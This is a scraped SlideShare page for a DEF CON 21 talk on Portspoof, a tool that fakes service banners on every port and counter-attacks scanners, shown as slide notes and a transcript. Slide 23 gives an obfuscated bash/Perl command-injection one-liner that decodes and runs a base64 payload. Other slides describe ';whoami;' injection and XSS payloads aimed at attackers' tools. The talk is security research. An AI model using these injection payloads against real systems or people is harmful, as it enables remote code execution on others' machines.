Your SlideShare is downloading. ×
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"

673

Published on

It is commonly believed that Offensive Defense is just a theory that is difficult to be used effectively in practice, but that is not entirely true... …

It is commonly believed that Offensive Defense is just a theory that is difficult to be used effectively in practice, but that is not entirely true...

During my talk along with a new service emulation technique, that will render standard port scanner results nearly useless and leave your attackers with an arduous analysis, I will focus on practical (automated) exploitation of a hackers' offensive toolbox. A few interesting attack vectors against software taken from the Internet will be presented.

It turns out you can get pwn'ed even through your Nmap scripts if you are not careful enough.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
673
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
8
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Thanks for coming, start presentation
  • shortly
  • Results of my attempt to put some of the Active Defense concepts into practiceTechnique that aims at slowing down your attackers and keeping them from staying low profile (nearly- infinite time)Example based, that tries to show the potential that lies in Offensive Defense/automated (exploiting your attackers exploits)
  • Knowledge is the key, port scan
  • Starting point for every pentest …
  • IdeaImplemented (Portspoof)Results?
  • Get a precise view …
  • Our offenders will get more information then they ever wanted…
  • Closer lookA whole range of different services (possibly none or all of them are valid)So, you have finished the scan and still know almost nothing…
  • Bonus protection (none port is closes)
  • The same goes for other port scanners…
  • TIME –TIME – STEALTH –
  • User spaceNo rootEasy configurable
  • - Exploiting attacker’s tools and exploitsExample based with few interesting vectors and examples (top of an ice mountain)
  • Lets come back to Nmap again (due itspopoularity)Injection pointsPORTSPOFO OUTPUT - Set up our software to have different payloads on each port (good approach for automated tools)
  • In practice if your system returns the following service banner (that will match Nmap regular expression).“Hello World” example
  • Non Nmap based example
  • Storage file content is under our controlSimple payload will exploit attackers machine
  • You can use the previously created payload for automated exploitation
  • Straigjtforward vulnerability Again whoami will exploit attackers machine…
  • Transcript

    • 1. © 2012 Presented by: Pwn’ing you(r) cyber offenders Piotr Duszynski @drk1wi
    • 2. © 2012 ;WHOAMI;#? • Senior Security Consultant @Trustwave (OSCE, OSCP, …) • In security field for the past 6 years, hacking since 9 … • Enjoys security research, crazy road trips and good music 2
    • 3. © 2012 What is this presentation about? 1. “Annoyance and Camouflage” (reconnaissance phase) New defensive technique that renders your attacker‟s port scan results nearly useless … 2. “Active (Offensive) Defense” New attack vectors against you(r) attackers offensive toolbox … • POC DEMO: example exploit for one of the well known scanners. 3 Active Defense in practice
    • 4. © 2012© 2012 “To blind attackers’ tools” The art of Annoyance and Camouflage
    • 5. © 2012 A typical reconnaissance phase • Standard case scenario (target system is behind a Firewall) 5 # nmap -sV -O portspoof.org
    • 6. © 2012 Portspoof – implementation of the idea 6 What if (worst case scenario): • All 65535 ports appear to be open … *Portspoof will bind to a single port • On every open port there appears to be a service listening… *Portspoof will dynamically generate valid service signatures ~ 8000 supported TASK: Get a precise view of all running services…
    • 7. © 2012 Spicing up the reconnaissance phase with Portspoof • Worst case scenario (target system is behind the Portspoof) : 7 $ nmap –sV -p - -PN portspoof.org …. You will need a lot of patience!
    • 8. © 2012 Spicing up attackers‟ port scan results 8 Scanning statistics: 65.535 open ports (services) ~120 MB of sent data 30682 s (8.5h) and few beers later …
    • 9. © 2012 Spicing up attackers‟ port scan results 9
    • 10. © 2012 Spicing up attackers‟ port scan results 10 … and somewhere in the results you can find the hidden message …
    • 11. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results 11 $ nmap –sV -O portspoof.org
    • 12. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results: 12 Device type: general purpose Running (JUST GUESSING): Linux 3.X (93%) OS CPE: cpe:/o:linux:linux_kernel:3 Aggressive OS guesses: Linux 3.2 (93%), Linux 3.0 (92%), Linux 3.0 - 3.2 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Hosts: gTknkkuB, ouwH-rKWw, bWQnRo, ClFfHC, leLtAJg; OSs: Unix, Windows, Linux, Solaris, NetWare; Devices: print server, webcam, router, storage-misc, printer; CPE: cpe:/o:microsoft:windows, cpe:/o:redhat:linux, cpe:/o:sun:sunos,cpe:/o:novell:netware, cpe:/o:linux:linux_kernel
    • 13. © 2012 Spicing up attackers‟ port scan results • AMAP: $ amap -q portspoof.org 3000-3100 13
    • 14. © 2012 Spicing up attackers‟ port scan results - conclusions • SYN/ACK/FIN/… stealth scans are no longer helpful! • OS identification is a bit more challenging … • Forces to generate a huge amount of traffic through service probes … • Frustrates and forces to carry out a huge amount of arduous by your attackers … 14 “Security by obscurity” - but so is the mimicry in the natural environment…
    • 15. © 2012 Bypassing Portspoof • There is no trivial way to detect false signatures • IP Fragmentation and other network evasion techniques will not work • Thread pool exhaustion (Full connect TCP DOS): $ nmap -sV portspoof.org (30 parallel instances) ~ 999/1000 ports were found as open ANTI-DOS SOLUTION: 1. Play with Portspoof thread count and client/thread parameters . 2. Use iptables mark rules and tc (traffic shaper). 15 Please send any bypass ideas to the portspoof mailing list ;)
    • 16. © 2012 Portspoof tool • User space software running without root priv. ! (no kernel modules) • Binds to just one port per instance (127.0.0.1:4444) • Configurable through iptables: - A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444 16
    • 17. © 2012© 2012 “Active (Offensive) Defense in practice” exploiting your attackers‟ tools… “The best defense is a good offense” - Sun Tzu (The Art of War)
    • 18. © 2012 Automated exploitation through Nmap Interesting injection points through NMAP service probe engine: • Version fields • Hosts fields 18 ./portspoof –f fuzz_payloads –n fuzz_nmap_signatures
    • 19. © 2012 Open source reporting tool: XSS example 19 Nmap report generation tool nr.1 (anonymous) Tip: Safari „Same Origin Policy‟ for file URIs doesn‟t work. Regards to Michele Orru!
    • 20. © 2012 Commercial port scanner: non-Nmap XSS example 20 report generation tool nr. 2 (McAfee SuperScan 4.0) XSS payload: partially UTF-7 encoded without parenthesis
    • 21. © 2012 Public exploit script: OS command injection example nr.3 21 Exploiting your attackers’ exploits :D # Lotus CMS 3.0 eval() Remote Command Execution Exploit:
    • 22. © 2012 Public exploit script: OS command injection example 22 Portspoof exploiting payload: 80 “whoamin” Exploits‟ new extra output: Vulnerable code : $( cat “storage2” ) FAIL ----->
    • 23. © 2012 Public exploit script: OS command injection example 23 Creating a weaponized OS command injection payload one-liner for : --------------------------------------------------------------------------------------------- /bin/basht-ct{perl,-e,$0,useSPACEMIME::Base64,B64_perl_payload }t $_=$ARGV[0];~s/SPACE/t/ig;eval;$_=$ARGV[1];eval(decode_base64($_)); ----------------------------------------------------------------------------------------------------- • Use t instead of spaces • Use „Bash Brace Expansion‟ to address the lack of apostrophes • Use regex to add additional t • Import missing packages on the fly and execute Base64 encoded payload >:] $(cat file)
    • 24. © 2012 Public exploit script: OS command injection example 24 Exploits‟ new extra output: Vulnerable code : $( cat “storage2” )
    • 25. © 2012 Public exploit script: OS command injection example nr.4 25 cookie= `printf "GET /jmx-console/ HTTP/1.1nHost: $1nn" | nc $1 $2| grep -i JSESSION | cut -d: -f2- | cut -d; -f1` Code snippet from one of the „auto_pwn‟ scripts: Portspoof exploiting payload: 80 “whoamin”
    • 26. © 2012 Blind exploitation with Portspoof (aka. Aggressive Honeypot) 26 Conclusions: - Majority of exploits, reporting tools and scanning software is exploitable with simple payloads … ;whoami; - Auto-PWN scripts are usually dumb (they try to exploit all ports) … To rule them all…
    • 27. © 2012 In hunt for a vulnerable software … Use your Google jutsu skills (previous examples were found in TOP10) : 27 And you will find many interesting targets… Tip: search for .sh (~8000 results), .pl , etc.
    • 28. © 2012© 2012 Nmap NSE script PWN Demo
    • 29. © 2012 Thank you  Portspoof URLs: http://portspoof.org/ Mailing list: portspoof-users-subscribe@portspoof.org Git repository (including the presented exploits): https://github.com/drk1wi/portspoof/ Contact me: piotr[at]duszynski.eu (PGP fingerprint: FCD2 B5DA 1AE2 056F 4AC8 901D 7258 7496 ECCD 36F3) http://twitter/drk1wi 29

    ×